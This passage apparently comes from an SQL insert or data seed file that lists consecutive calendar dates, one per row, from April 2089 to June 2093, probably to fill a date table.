('2089-04-28'),
('2089-04-29'),
('2089-04-30'),
('2089-05-01'),
('2089-05-02'),
('2089-05-03'),
('2089-05-04'),
('2089-05-05'),
('2089-05-06'),
('2089-05-07'),
('2089-05-08'),
('2089-05-09'),
('2089-05-10'),
('2089-05-11'),
('2089-05-12'),
('2089-05-13'),
('2089-05-14'),
('2089-05-15'),
('2089-05-16'),
('2089-05-17'),
('2089-05-18'),
('2089-05-19'),
('2089-05-20'),
('2089-05-21'),
('2089-05-22'),
('2089-05-23'),
('2089-05-24'),
('2089-05-25'),
('2089-05-26'),
('2089-05-27'),
('2089-05-28'),
('2089-05-29'),
('2089-05-30'),
('2089-05-31'),
('2089-06-01'),
('2089-06-02'),
('2089-06-03'),
('2089-06-04'),
('2089-06-05'),
('2089-06-06'),
('2089-06-07'),
('2089-06-08'),
('2089-06-09'),
('2089-06-10'),
('2089-06-11'),
('2089-06-12'),
('2089-06-13'),
('2089-06-14'),
('2089-06-15'),
('2089-06-16'),
('2089-06-17'),
('2089-06-18'),
('2089-06-19'),
('2089-06-20'),
('2089-06-21'),
('2089-06-22'),
('2089-06-23'),
('2089-06-24'),
('2089-06-25'),
('2089-06-26'),
('2089-06-27'),
('2089-06-28'),
('2089-06-29'),
('2089-06-30'),
('2089-07-01'),
('2089-07-02'),
('2089-07-03'),
('2089-07-04'),
('2089-07-05'),
('2089-07-06'),
('2089-07-07'),
('2089-07-08'),
('2089-07-09'),
('2089-07-10'),
('2089-07-11'),
('2089-07-12'),
('2089-07-13'),
('2089-07-14'),
('2089-07-15'),
('2089-07-16'),
('2089-07-17'),
('2089-07-18'),
('2089-07-19'),
('2089-07-20'),
('2089-07-21'),
('2089-07-22'),
('2089-07-23'),
('2089-07-24'),
('2089-07-25'),
('2089-07-26'),
('2089-07-27'),
('2089-07-28'),
('2089-07-29'),
('2089-07-30'),
('2089-07-31'),
('2089-08-01'),
('2089-08-02'),
('2089-08-03'),
('2089-08-04'),
('2089-08-05'),
('2089-08-06'),
('2089-08-07'),
('2089-08-08'),
('2089-08-09'),
('2089-08-10'),
('2089-08-11'),
('2089-08-12'),
('2089-08-13'),
('2089-08-14'),
('2089-08-15'),
('2089-08-16'),
('2089-08-17'),
('2089-08-18'),
('2089-08-19'),
('2089-08-20'),
('2089-08-21'),
('2089-08-22'),
('2089-08-23'),
('2089-08-24'),
('2089-08-25'),
('2089-08-26'),
('2089-08-27'),
('2089-08-28'),
('2089-08-29'),
('2089-08-30'),
('2089-08-31'),
('2089-09-01'),
('2089-09-02'),
('2089-09-03'),
('2089-09-04'),
('2089-09-05'),
('2089-09-06'),
('2089-09-07'),
('2089-09-08'),
('2089-09-09'),
('2089-09-10'),
('2089-09-11'),
('2089-09-12'),
('2089-09-13'),
('2089-09-14'),
('2089-09-15'),
('2089-09-16'),
('2089-09-17'),
('2089-09-18'),
('2089-09-19'),
('2089-09-20'),
('2089-09-21'),
('2089-09-22'),
('2089-09-23'),
('2089-09-24'),
('2089-09-25'),
('2089-09-26'),
('2089-09-27'),
('2089-09-28'),
('2089-09-29'),
('2089-09-30'),
('2089-10-01'),
('2089-10-02'),
('2089-10-03'),
('2089-10-04'),
('2089-10-05'),
('2089-10-06'),
('2089-10-07'),
('2089-10-08'),
('2089-10-09'),
('2089-10-10'),
('2089-10-11'),
('2089-10-12'),
('2089-10-13'),
('2089-10-14'),
('2089-10-15'),
('2089-10-16'),
('2089-10-17'),
('2089-10-18'),
('2089-10-19'),
('2089-10-20'),
('2089-10-21'),
('2089-10-22'),
('2089-10-23'),
('2089-10-24'),
('2089-10-25'),
('2089-10-26'),
('2089-10-27'),
('2089-10-28'),
('2089-10-29'),
('2089-10-30'),
('2089-10-31'),
('2089-11-01'),
('2089-11-02'),
('2089-11-03'),
('2089-11-04'),
('2089-11-05'),
('2089-11-06'),
('2089-11-07'),
('2089-11-08'),
('2089-11-09'),
('2089-11-10'),
('2089-11-11'),
('2089-11-12'),
('2089-11-13'),
('2089-11-14'),
('2089-11-15'),
('2089-11-16'),
('2089-11-17'),
('2089-11-18'),
('2089-11-19'),
('2089-11-20'),
('2089-11-21'),
('2089-11-22'),
('2089-11-23'),
('2089-11-24'),
('2089-11-25'),
('2089-11-26'),
('2089-11-27'),
('2089-11-28'),
('2089-11-29'),
('2089-11-30'),
('2089-12-01'),
('2089-12-02'),
('2089-12-03'),
('2089-12-04'),
('2089-12-05'),
('2089-12-06'),
('2089-12-07'),
('2089-12-08'),
('2089-12-09'),
('2089-12-10'),
('2089-12-11'),
('2089-12-12'),
('2089-12-13'),
('2089-12-14'),
('2089-12-15'),
('2089-12-16'),
('2089-12-17'),
('2089-12-18'),
('2089-12-19'),
('2089-12-20'),
('2089-12-21'),
('2089-12-22'),
('2089-12-23'),
('2089-12-24'),
('2089-12-25'),
('2089-12-26'),
('2089-12-27'),
('2089-12-28'),
('2089-12-29'),
('2089-12-30'),
('2089-12-31'),
('2090-01-01'),
('2090-01-02'),
('2090-01-03'),
('2090-01-04'),
('2090-01-05'),
('2090-01-06'),
('2090-01-07'),
('2090-01-08'),
('2090-01-09'),
('2090-01-10'),
('2090-01-11'),
('2090-01-12'),
('2090-01-13'),
('2090-01-14'),
('2090-01-15'),
('2090-01-16'),
('2090-01-17'),
('2090-01-18'),
('2090-01-19'),
('2090-01-20'),
('2090-01-21'),
('2090-01-22'),
('2090-01-23'),
('2090-01-24'),
('2090-01-25'),
('2090-01-26'),
('2090-01-27'),
('2090-01-28'),
('2090-01-29'),
('2090-01-30'),
('2090-01-31'),
('2090-02-01'),
('2090-02-02'),
('2090-02-03'),
('2090-02-04'),
('2090-02-05'),
('2090-02-06'),
('2090-02-07'),
('2090-02-08'),
('2090-02-09'),
('2090-02-10'),
('2090-02-11'),
('2090-02-12'),
('2090-02-13'),
('2090-02-14'),
('2090-02-15'),
('2090-02-16'),
('2090-02-17'),
('2090-02-18'),
('2090-02-19'),
('2090-02-20'),
('2090-02-21'),
('2090-02-22'),
('2090-02-23'),
('2090-02-24'),
('2090-02-25'),
('2090-02-26'),
('2090-02-27'),
('2090-02-28'),
('2090-03-01'),
('2090-03-02'),
('2090-03-03'),
('2090-03-04'),
('2090-03-05'),
('2090-03-06'),
('2090-03-07'),
('2090-03-08'),
('2090-03-09'),
('2090-03-10'),
('2090-03-11'),
('2090-03-12'),
('2090-03-13'),
('2090-03-14'),
('2090-03-15'),
('2090-03-16'),
('2090-03-17'),
('2090-03-18'),
('2090-03-19'),
('2090-03-20'),
('2090-03-21'),
('2090-03-22'),
('2090-03-23'),
('2090-03-24'),
('2090-03-25'),
('2090-03-26'),
('2090-03-27'),
('2090-03-28'),
('2090-03-29'),
('2090-03-30'),
('2090-03-31'),
('2090-04-01'),
('2090-04-02'),
('2090-04-03'),
('2090-04-04'),
('2090-04-05'),
('2090-04-06'),
('2090-04-07'),
('2090-04-08'),
('2090-04-09'),
('2090-04-10'),
('2090-04-11'),
('2090-04-12'),
('2090-04-13'),
('2090-04-14'),
('2090-04-15'),
('2090-04-16'),
('2090-04-17'),
('2090-04-18'),
('2090-04-19'),
('2090-04-20'),
('2090-04-21'),
('2090-04-22'),
('2090-04-23'),
('2090-04-24'),
('2090-04-25'),
('2090-04-26'),
('2090-04-27'),
('2090-04-28'),
('2090-04-29'),
('2090-04-30'),
('2090-05-01'),
('2090-05-02'),
('2090-05-03'),
('2090-05-04'),
('2090-05-05'),
('2090-05-06'),
('2090-05-07'),
('2090-05-08'),
('2090-05-09'),
('2090-05-10'),
('2090-05-11'),
('2090-05-12'),
('2090-05-13'),
('2090-05-14'),
('2090-05-15'),
('2090-05-16'),
('2090-05-17'),
('2090-05-18'),
('2090-05-19'),
('2090-05-20'),
('2090-05-21'),
('2090-05-22'),
('2090-05-23'),
('2090-05-24'),
('2090-05-25'),
('2090-05-26'),
('2090-05-27'),
('2090-05-28'),
('2090-05-29'),
('2090-05-30'),
('2090-05-31'),
('2090-06-01'),
('2090-06-02'),
('2090-06-03'),
('2090-06-04'),
('2090-06-05'),
('2090-06-06'),
('2090-06-07'),
('2090-06-08'),
('2090-06-09'),
('2090-06-10'),
('2090-06-11'),
('2090-06-12'),
('2090-06-13'),
('2090-06-14'),
('2090-06-15'),
('2090-06-16'),
('2090-06-17'),
('2090-06-18'),
('2090-06-19'),
('2090-06-20'),
('2090-06-21'),
('2090-06-22'),
('2090-06-23'),
('2090-06-24'),
('2090-06-25'),
('2090-06-26'),
('2090-06-27'),
('2090-06-28'),
('2090-06-29'),
('2090-06-30'),
('2090-07-01'),
('2090-07-02'),
('2090-07-03'),
('2090-07-04'),
('2090-07-05'),
('2090-07-06'),
('2090-07-07'),
('2090-07-08'),
('2090-07-09'),
('2090-07-10'),
('2090-07-11'),
('2090-07-12'),
('2090-07-13'),
('2090-07-14'),
('2090-07-15'),
('2090-07-16'),
('2090-07-17'),
('2090-07-18'),
('2090-07-19'),
('2090-07-20'),
('2090-07-21'),
('2090-07-22'),
('2090-07-23'),
('2090-07-24'),
('2090-07-25'),
('2090-07-26'),
('2090-07-27'),
('2090-07-28'),
('2090-07-29'),
('2090-07-30'),
('2090-07-31'),
('2090-08-01'),
('2090-08-02'),
('2090-08-03'),
('2090-08-04'),
('2090-08-05'),
('2090-08-06'),
('2090-08-07'),
('2090-08-08'),
('2090-08-09'),
('2090-08-10'),
('2090-08-11'),
('2090-08-12'),
('2090-08-13'),
('2090-08-14'),
('2090-08-15'),
('2090-08-16'),
('2090-08-17'),
('2090-08-18'),
('2090-08-19'),
('2090-08-20'),
('2090-08-21'),
('2090-08-22'),
('2090-08-23'),
('2090-08-24'),
('2090-08-25'),
('2090-08-26'),
('2090-08-27'),
('2090-08-28'),
('2090-08-29'),
('2090-08-30'),
('2090-08-31'),
('2090-09-01'),
('2090-09-02'),
('2090-09-03'),
('2090-09-04'),
('2090-09-05'),
('2090-09-06'),
('2090-09-07'),
('2090-09-08'),
('2090-09-09'),
('2090-09-10'),
('2090-09-11'),
('2090-09-12'),
('2090-09-13'),
('2090-09-14'),
('2090-09-15'),
('2090-09-16'),
('2090-09-17'),
('2090-09-18'),
('2090-09-19'),
('2090-09-20'),
('2090-09-21'),
('2090-09-22'),
('2090-09-23'),
('2090-09-24'),
('2090-09-25'),
('2090-09-26'),
('2090-09-27'),
('2090-09-28'),
('2090-09-29'),
('2090-09-30'),
('2090-10-01'),
('2090-10-02'),
('2090-10-03'),
('2090-10-04'),
('2090-10-05'),
('2090-10-06'),
('2090-10-07'),
('2090-10-08'),
('2090-10-09'),
('2090-10-10'),
('2090-10-11'),
('2090-10-12'),
('2090-10-13'),
('2090-10-14'),
('2090-10-15'),
('2090-10-16'),
('2090-10-17'),
('2090-10-18'),
('2090-10-19'),
('2090-10-20'),
('2090-10-21'),
('2090-10-22'),
('2090-10-23'),
('2090-10-24'),
('2090-10-25'),
('2090-10-26'),
('2090-10-27'),
('2090-10-28'),
('2090-10-29'),
('2090-10-30'),
('2090-10-31'),
('2090-11-01'),
('2090-11-02'),
('2090-11-03'),
('2090-11-04'),
('2090-11-05'),
('2090-11-06'),
('2090-11-07'),
('2090-11-08'),
('2090-11-09'),
('2090-11-10'),
('2090-11-11'),
('2090-11-12'),
('2090-11-13'),
('2090-11-14'),
('2090-11-15'),
('2090-11-16'),
('2090-11-17'),
('2090-11-18'),
('2090-11-19'),
('2090-11-20'),
('2090-11-21'),
('2090-11-22'),
('2090-11-23'),
('2090-11-24'),
('2090-11-25'),
('2090-11-26'),
('2090-11-27'),
('2090-11-28'),
('2090-11-29'),
('2090-11-30'),
('2090-12-01'),
('2090-12-02'),
('2090-12-03'),
('2090-12-04'),
('2090-12-05'),
('2090-12-06'),
('2090-12-07'),
('2090-12-08'),
('2090-12-09'),
('2090-12-10'),
('2090-12-11'),
('2090-12-12'),
('2090-12-13'),
('2090-12-14'),
('2090-12-15'),
('2090-12-16'),
('2090-12-17'),
('2090-12-18'),
('2090-12-19'),
('2090-12-20'),
('2090-12-21'),
('2090-12-22'),
('2090-12-23'),
('2090-12-24'),
('2090-12-25'),
('2090-12-26'),
('2090-12-27'),
('2090-12-28'),
('2090-12-29'),
('2090-12-30'),
('2090-12-31'),
('2091-01-01'),
('2091-01-02'),
('2091-01-03'),
('2091-01-04'),
('2091-01-05'),
('2091-01-06'),
('2091-01-07'),
('2091-01-08'),
('2091-01-09'),
('2091-01-10'),
('2091-01-11'),
('2091-01-12'),
('2091-01-13'),
('2091-01-14'),
('2091-01-15'),
('2091-01-16'),
('2091-01-17'),
('2091-01-18'),
('2091-01-19'),
('2091-01-20'),
('2091-01-21'),
('2091-01-22'),
('2091-01-23'),
('2091-01-24'),
('2091-01-25'),
('2091-01-26'),
('2091-01-27'),
('2091-01-28'),
('2091-01-29'),
('2091-01-30'),
('2091-01-31'),
('2091-02-01'),
('2091-02-02'),
('2091-02-03'),
('2091-02-04'),
('2091-02-05'),
('2091-02-06'),
('2091-02-07'),
('2091-02-08'),
('2091-02-09'),
('2091-02-10'),
('2091-02-11'),
('2091-02-12'),
('2091-02-13'),
('2091-02-14'),
('2091-02-15'),
('2091-02-16'),
('2091-02-17'),
('2091-02-18'),
('2091-02-19'),
('2091-02-20'),
('2091-02-21'),
('2091-02-22'),
('2091-02-23'),
('2091-02-24'),
('2091-02-25'),
('2091-02-26'),
('2091-02-27'),
('2091-02-28'),
('2091-03-01'),
('2091-03-02'),
('2091-03-03'),
('2091-03-04'),
('2091-03-05'),
('2091-03-06'),
('2091-03-07'),
('2091-03-08'),
('2091-03-09'),
('2091-03-10'),
('2091-03-11'),
('2091-03-12'),
('2091-03-13'),
('2091-03-14'),
('2091-03-15'),
('2091-03-16'),
('2091-03-17'),
('2091-03-18'),
('2091-03-19'),
('2091-03-20'),
('2091-03-21'),
('2091-03-22'),
('2091-03-23'),
('2091-03-24'),
('2091-03-25'),
('2091-03-26'),
('2091-03-27'),
('2091-03-28'),
('2091-03-29'),
('2091-03-30'),
('2091-03-31'),
('2091-04-01'),
('2091-04-02'),
('2091-04-03'),
('2091-04-04'),
('2091-04-05'),
('2091-04-06'),
('2091-04-07'),
('2091-04-08'),
('2091-04-09'),
('2091-04-10'),
('2091-04-11'),
('2091-04-12'),
('2091-04-13'),
('2091-04-14'),
('2091-04-15'),
('2091-04-16'),
('2091-04-17'),
('2091-04-18'),
('2091-04-19'),
('2091-04-20'),
('2091-04-21'),
('2091-04-22'),
('2091-04-23'),
('2091-04-24'),
('2091-04-25'),
('2091-04-26'),
('2091-04-27'),
('2091-04-28'),
('2091-04-29'),
('2091-04-30'),
('2091-05-01'),
('2091-05-02'),
('2091-05-03'),
('2091-05-04'),
('2091-05-05'),
('2091-05-06'),
('2091-05-07'),
('2091-05-08'),
('2091-05-09'),
('2091-05-10'),
('2091-05-11'),
('2091-05-12'),
('2091-05-13'),
('2091-05-14'),
('2091-05-15'),
('2091-05-16'),
('2091-05-17'),
('2091-05-18'),
('2091-05-19'),
('2091-05-20'),
('2091-05-21'),
('2091-05-22'),
('2091-05-23'),
('2091-05-24'),
('2091-05-25'),
('2091-05-26'),
('2091-05-27'),
('2091-05-28'),
('2091-05-29'),
('2091-05-30'),
('2091-05-31'),
('2091-06-01'),
('2091-06-02'),
('2091-06-03'),
('2091-06-04'),
('2091-06-05'),
('2091-06-06'),
('2091-06-07'),
('2091-06-08'),
('2091-06-09'),
('2091-06-10'),
('2091-06-11'),
('2091-06-12'),
('2091-06-13'),
('2091-06-14'),
('2091-06-15'),
('2091-06-16'),
('2091-06-17'),
('2091-06-18'),
('2091-06-19'),
('2091-06-20'),
('2091-06-21'),
('2091-06-22'),
('2091-06-23'),
('2091-06-24'),
('2091-06-25'),
('2091-06-26'),
('2091-06-27'),
('2091-06-28'),
('2091-06-29'),
('2091-06-30'),
('2091-07-01'),
('2091-07-02'),
('2091-07-03'),
('2091-07-04'),
('2091-07-05'),
('2091-07-06'),
('2091-07-07'),
('2091-07-08'),
('2091-07-09'),
('2091-07-10'),
('2091-07-11'),
('2091-07-12'),
('2091-07-13'),
('2091-07-14'),
('2091-07-15'),
('2091-07-16'),
('2091-07-17'),
('2091-07-18'),
('2091-07-19'),
('2091-07-20'),
('2091-07-21'),
('2091-07-22'),
('2091-07-23'),
('2091-07-24'),
('2091-07-25'),
('2091-07-26'),
('2091-07-27'),
('2091-07-28'),
('2091-07-29'),
('2091-07-30'),
('2091-07-31'),
('2091-08-01'),
('2091-08-02'),
('2091-08-03'),
('2091-08-04'),
('2091-08-05'),
('2091-08-06'),
('2091-08-07'),
('2091-08-08'),
('2091-08-09'),
('2091-08-10'),
('2091-08-11'),
('2091-08-12'),
('2091-08-13'),
('2091-08-14'),
('2091-08-15'),
('2091-08-16'),
('2091-08-17'),
('2091-08-18'),
('2091-08-19'),
('2091-08-20'),
('2091-08-21'),
('2091-08-22'),
('2091-08-23'),
('2091-08-24'),
('2091-08-25'),
('2091-08-26'),
('2091-08-27'),
('2091-08-28'),
('2091-08-29'),
('2091-08-30'),
('2091-08-31'),
('2091-09-01'),
('2091-09-02'),
('2091-09-03'),
('2091-09-04'),
('2091-09-05'),
('2091-09-06'),
('2091-09-07'),
('2091-09-08'),
('2091-09-09'),
('2091-09-10'),
('2091-09-11'),
('2091-09-12'),
('2091-09-13'),
('2091-09-14'),
('2091-09-15'),
('2091-09-16'),
('2091-09-17'),
('2091-09-18'),
('2091-09-19'),
('2091-09-20'),
('2091-09-21'),
('2091-09-22'),
('2091-09-23'),
('2091-09-24'),
('2091-09-25'),
('2091-09-26'),
('2091-09-27'),
('2091-09-28'),
('2091-09-29'),
('2091-09-30'),
('2091-10-01'),
('2091-10-02'),
('2091-10-03'),
('2091-10-04'),
('2091-10-05'),
('2091-10-06'),
('2091-10-07'),
('2091-10-08'),
('2091-10-09'),
('2091-10-10'),
('2091-10-11'),
('2091-10-12'),
('2091-10-13'),
('2091-10-14'),
('2091-10-15'),
('2091-10-16'),
('2091-10-17'),
('2091-10-18'),
('2091-10-19'),
('2091-10-20'),
('2091-10-21'),
('2091-10-22'),
('2091-10-23'),
('2091-10-24'),
('2091-10-25'),
('2091-10-26'),
('2091-10-27'),
('2091-10-28'),
('2091-10-29'),
('2091-10-30'),
('2091-10-31'),
('2091-11-01'),
('2091-11-02'),
('2091-11-03'),
('2091-11-04'),
('2091-11-05'),
('2091-11-06'),
('2091-11-07'),
('2091-11-08'),
('2091-11-09'),
('2091-11-10'),
('2091-11-11'),
('2091-11-12'),
('2091-11-13'),
('2091-11-14'),
('2091-11-15'),
('2091-11-16'),
('2091-11-17'),
('2091-11-18'),
('2091-11-19'),
('2091-11-20'),
('2091-11-21'),
('2091-11-22'),
('2091-11-23'),
('2091-11-24'),
('2091-11-25'),
('2091-11-26'),
('2091-11-27'),
('2091-11-28'),
('2091-11-29'),
('2091-11-30'),
('2091-12-01'),
('2091-12-02'),
('2091-12-03'),
('2091-12-04'),
('2091-12-05'),
('2091-12-06'),
('2091-12-07'),
('2091-12-08'),
('2091-12-09'),
('2091-12-10'),
('2091-12-11'),
('2091-12-12'),
('2091-12-13'),
('2091-12-14'),
('2091-12-15'),
('2091-12-16'),
('2091-12-17'),
('2091-12-18'),
('2091-12-19'),
('2091-12-20'),
('2091-12-21'),
('2091-12-22'),
('2091-12-23'),
('2091-12-24'),
('2091-12-25'),
('2091-12-26'),
('2091-12-27'),
('2091-12-28'),
('2091-12-29'),
('2091-12-30'),
('2091-12-31'),
('2092-01-01'),
('2092-01-02'),
('2092-01-03'),
('2092-01-04'),
('2092-01-05'),
('2092-01-06'),
('2092-01-07'),
('2092-01-08'),
('2092-01-09'),
('2092-01-10'),
('2092-01-11'),
('2092-01-12'),
('2092-01-13'),
('2092-01-14'),
('2092-01-15'),
('2092-01-16'),
('2092-01-17'),
('2092-01-18'),
('2092-01-19'),
('2092-01-20'),
('2092-01-21'),
('2092-01-22'),
('2092-01-23'),
('2092-01-24'),
('2092-01-25'),
('2092-01-26'),
('2092-01-27'),
('2092-01-28'),
('2092-01-29'),
('2092-01-30'),
('2092-01-31'),
('2092-02-01'),
('2092-02-02'),
('2092-02-03'),
('2092-02-04'),
('2092-02-05'),
('2092-02-06'),
('2092-02-07'),
('2092-02-08'),
('2092-02-09'),
('2092-02-10'),
('2092-02-11'),
('2092-02-12'),
('2092-02-13'),
('2092-02-14'),
('2092-02-15'),
('2092-02-16'),
('2092-02-17'),
('2092-02-18'),
('2092-02-19'),
('2092-02-20'),
('2092-02-21'),
('2092-02-22'),
('2092-02-23'),
('2092-02-24'),
('2092-02-25'),
('2092-02-26'),
('2092-02-27'),
('2092-02-28'),
('2092-02-29'),
('2092-03-01'),
('2092-03-02'),
('2092-03-03'),
('2092-03-04'),
('2092-03-05'),
('2092-03-06'),
('2092-03-07'),
('2092-03-08'),
('2092-03-09'),
('2092-03-10'),
('2092-03-11'),
('2092-03-12'),
('2092-03-13'),
('2092-03-14'),
('2092-03-15'),
('2092-03-16'),
('2092-03-17'),
('2092-03-18'),
('2092-03-19'),
('2092-03-20'),
('2092-03-21'),
('2092-03-22'),
('2092-03-23'),
('2092-03-24'),
('2092-03-25'),
('2092-03-26'),
('2092-03-27'),
('2092-03-28'),
('2092-03-29'),
('2092-03-30'),
('2092-03-31'),
('2092-04-01'),
('2092-04-02'),
('2092-04-03'),
('2092-04-04'),
('2092-04-05'),
('2092-04-06'),
('2092-04-07'),
('2092-04-08'),
('2092-04-09'),
('2092-04-10'),
('2092-04-11'),
('2092-04-12'),
('2092-04-13'),
('2092-04-14'),
('2092-04-15'),
('2092-04-16'),
('2092-04-17'),
('2092-04-18'),
('2092-04-19'),
('2092-04-20'),
('2092-04-21'),
('2092-04-22'),
('2092-04-23'),
('2092-04-24'),
('2092-04-25'),
('2092-04-26'),
('2092-04-27'),
('2092-04-28'),
('2092-04-29'),
('2092-04-30'),
('2092-05-01'),
('2092-05-02'),
('2092-05-03'),
('2092-05-04'),
('2092-05-05'),
('2092-05-06'),
('2092-05-07'),
('2092-05-08'),
('2092-05-09'),
('2092-05-10'),
('2092-05-11'),
('2092-05-12'),
('2092-05-13'),
('2092-05-14'),
('2092-05-15'),
('2092-05-16'),
('2092-05-17'),
('2092-05-18'),
('2092-05-19'),
('2092-05-20'),
('2092-05-21'),
('2092-05-22'),
('2092-05-23'),
('2092-05-24'),
('2092-05-25'),
('2092-05-26'),
('2092-05-27'),
('2092-05-28'),
('2092-05-29'),
('2092-05-30'),
('2092-05-31'),
('2092-06-01'),
('2092-06-02'),
('2092-06-03'),
('2092-06-04'),
('2092-06-05'),
('2092-06-06'),
('2092-06-07'),
('2092-06-08'),
('2092-06-09'),
('2092-06-10'),
('2092-06-11'),
('2092-06-12'),
('2092-06-13'),
('2092-06-14'),
('2092-06-15'),
('2092-06-16'),
('2092-06-17'),
('2092-06-18'),
('2092-06-19'),
('2092-06-20'),
('2092-06-21'),
('2092-06-22'),
('2092-06-23'),
('2092-06-24'),
('2092-06-25'),
('2092-06-26'),
('2092-06-27'),
('2092-06-28'),
('2092-06-29'),
('2092-06-30'),
('2092-07-01'),
('2092-07-02'),
('2092-07-03'),
('2092-07-04'),
('2092-07-05'),
('2092-07-06'),
('2092-07-07'),
('2092-07-08'),
('2092-07-09'),
('2092-07-10'),
('2092-07-11'),
('2092-07-12'),
('2092-07-13'),
('2092-07-14'),
('2092-07-15'),
('2092-07-16'),
('2092-07-17'),
('2092-07-18'),
('2092-07-19'),
('2092-07-20'),
('2092-07-21'),
('2092-07-22'),
('2092-07-23'),
('2092-07-24'),
('2092-07-25'),
('2092-07-26'),
('2092-07-27'),
('2092-07-28'),
('2092-07-29'),
('2092-07-30'),
('2092-07-31'),
('2092-08-01'),
('2092-08-02'),
('2092-08-03'),
('2092-08-04'),
('2092-08-05'),
('2092-08-06'),
('2092-08-07'),
('2092-08-08'),
('2092-08-09'),
('2092-08-10'),
('2092-08-11'),
('2092-08-12'),
('2092-08-13'),
('2092-08-14'),
('2092-08-15'),
('2092-08-16'),
('2092-08-17'),
('2092-08-18'),
('2092-08-19'),
('2092-08-20'),
('2092-08-21'),
('2092-08-22'),
('2092-08-23'),
('2092-08-24'),
('2092-08-25'),
('2092-08-26'),
('2092-08-27'),
('2092-08-28'),
('2092-08-29'),
('2092-08-30'),
('2092-08-31'),
('2092-09-01'),
('2092-09-02'),
('2092-09-03'),
('2092-09-04'),
('2092-09-05'),
('2092-09-06'),
('2092-09-07'),
('2092-09-08'),
('2092-09-09'),
('2092-09-10'),
('2092-09-11'),
('2092-09-12'),
('2092-09-13'),
('2092-09-14'),
('2092-09-15'),
('2092-09-16'),
('2092-09-17'),
('2092-09-18'),
('2092-09-19'),
('2092-09-20'),
('2092-09-21'),
('2092-09-22'),
('2092-09-23'),
('2092-09-24'),
('2092-09-25'),
('2092-09-26'),
('2092-09-27'),
('2092-09-28'),
('2092-09-29'),
('2092-09-30'),
('2092-10-01'),
('2092-10-02'),
('2092-10-03'),
('2092-10-04'),
('2092-10-05'),
('2092-10-06'),
('2092-10-07'),
('2092-10-08'),
('2092-10-09'),
('2092-10-10'),
('2092-10-11'),
('2092-10-12'),
('2092-10-13'),
('2092-10-14'),
('2092-10-15'),
('2092-10-16'),
('2092-10-17'),
('2092-10-18'),
('2092-10-19'),
('2092-10-20'),
('2092-10-21'),
('2092-10-22'),
('2092-10-23'),
('2092-10-24'),
('2092-10-25'),
('2092-10-26'),
('2092-10-27'),
('2092-10-28'),
('2092-10-29'),
('2092-10-30'),
('2092-10-31'),
('2092-11-01'),
('2092-11-02'),
('2092-11-03'),
('2092-11-04'),
('2092-11-05'),
('2092-11-06'),
('2092-11-07'),
('2092-11-08'),
('2092-11-09'),
('2092-11-10'),
('2092-11-11'),
('2092-11-12'),
('2092-11-13'),
('2092-11-14'),
('2092-11-15'),
('2092-11-16'),
('2092-11-17'),
('2092-11-18'),
('2092-11-19'),
('2092-11-20'),
('2092-11-21'),
('2092-11-22'),
('2092-11-23'),
('2092-11-24'),
('2092-11-25'),
('2092-11-26'),
('2092-11-27'),
('2092-11-28'),
('2092-11-29'),
('2092-11-30'),
('2092-12-01'),
('2092-12-02'),
('2092-12-03'),
('2092-12-04'),
('2092-12-05'),
('2092-12-06'),
('2092-12-07'),
('2092-12-08'),
('2092-12-09'),
('2092-12-10'),
('2092-12-11'),
('2092-12-12'),
('2092-12-13'),
('2092-12-14'),
('2092-12-15'),
('2092-12-16'),
('2092-12-17'),
('2092-12-18'),
('2092-12-19'),
('2092-12-20'),
('2092-12-21'),
('2092-12-22'),
('2092-12-23'),
('2092-12-24'),
('2092-12-25'),
('2092-12-26'),
('2092-12-27'),
('2092-12-28'),
('2092-12-29'),
('2092-12-30'),
('2092-12-31'),
('2093-01-01'),
('2093-01-02'),
('2093-01-03'),
('2093-01-04'),
('2093-01-05'),
('2093-01-06'),
('2093-01-07'),
('2093-01-08'),
('2093-01-09'),
('2093-01-10'),
('2093-01-11'),
('2093-01-12'),
('2093-01-13'),
('2093-01-14'),
('2093-01-15'),
('2093-01-16'),
('2093-01-17'),
('2093-01-18'),
('2093-01-19'),
('2093-01-20'),
('2093-01-21'),
('2093-01-22'),
('2093-01-23'),
('2093-01-24'),
('2093-01-25'),
('2093-01-26'),
('2093-01-27'),
('2093-01-28'),
('2093-01-29'),
('2093-01-30'),
('2093-01-31'),
('2093-02-01'),
('2093-02-02'),
('2093-02-03'),
('2093-02-04'),
('2093-02-05'),
('2093-02-06'),
('2093-02-07'),
('2093-02-08'),
('2093-02-09'),
('2093-02-10'),
('2093-02-11'),
('2093-02-12'),
('2093-02-13'),
('2093-02-14'),
('2093-02-15'),
('2093-02-16'),
('2093-02-17'),
('2093-02-18'),
('2093-02-19'),
('2093-02-20'),
('2093-02-21'),
('2093-02-22'),
('2093-02-23'),
('2093-02-24'),
('2093-02-25'),
('2093-02-26'),
('2093-02-27'),
('2093-02-28'),
('2093-03-01'),
('2093-03-02'),
('2093-03-03'),
('2093-03-04'),
('2093-03-05'),
('2093-03-06'),
('2093-03-07'),
('2093-03-08'),
('2093-03-09'),
('2093-03-10'),
('2093-03-11'),
('2093-03-12'),
('2093-03-13'),
('2093-03-14'),
('2093-03-15'),
('2093-03-16'),
('2093-03-17'),
('2093-03-18'),
('2093-03-19'),
('2093-03-20'),
('2093-03-21'),
('2093-03-22'),
('2093-03-23'),
('2093-03-24'),
('2093-03-25'),
('2093-03-26'),
('2093-03-27'),
('2093-03-28'),
('2093-03-29'),
('2093-03-30'),
('2093-03-31'),
('2093-04-01'),
('2093-04-02'),
('2093-04-03'),
('2093-04-04'),
('2093-04-05'),
('2093-04-06'),
('2093-04-07'),
('2093-04-08'),
('2093-04-09'),
('2093-04-10'),
('2093-04-11'),
('2093-04-12'),
('2093-04-13'),
('2093-04-14'),
('2093-04-15'),
('2093-04-16'),
('2093-04-17'),
('2093-04-18'),
('2093-04-19'),
('2093-04-20'),
('2093-04-21'),
('2093-04-22'),
('2093-04-23'),
('2093-04-24'),
('2093-04-25'),
('2093-04-26'),
('2093-04-27'),
('2093-04-28'),
('2093-04-29'),
('2093-04-30'),
('2093-05-01'),
('2093-05-02'),
('2093-05-03'),
('2093-05-04'),
('2093-05-05'),
('2093-05-06'),
('2093-05-07'),
('2093-05-08'),
('2093-05-09'),
('2093-05-10'),
('2093-05-11'),
('2093-05-12'),
('2093-05-13'),
('2093-05-14'),
('2093-05-15'),
('2093-05-16'),
('2093-05-17'),
('2093-05-18'),
('2093-05-19'),
('2093-05-20'),
('2093-05-21'),
('2093-05-22'),
('2093-05-23'),
('2093-05-24'),
('2093-05-25'),
('2093-05-26'),
('2093-05-27'),
('2093-05-28'),
('2093-05-29'),
('2093-05-30'),
('2093-05-31'),
('2093-06-01'),
('2093-06-02'),
('2093-06-03'),
('2093-06-04'),
('2093-06-05'),
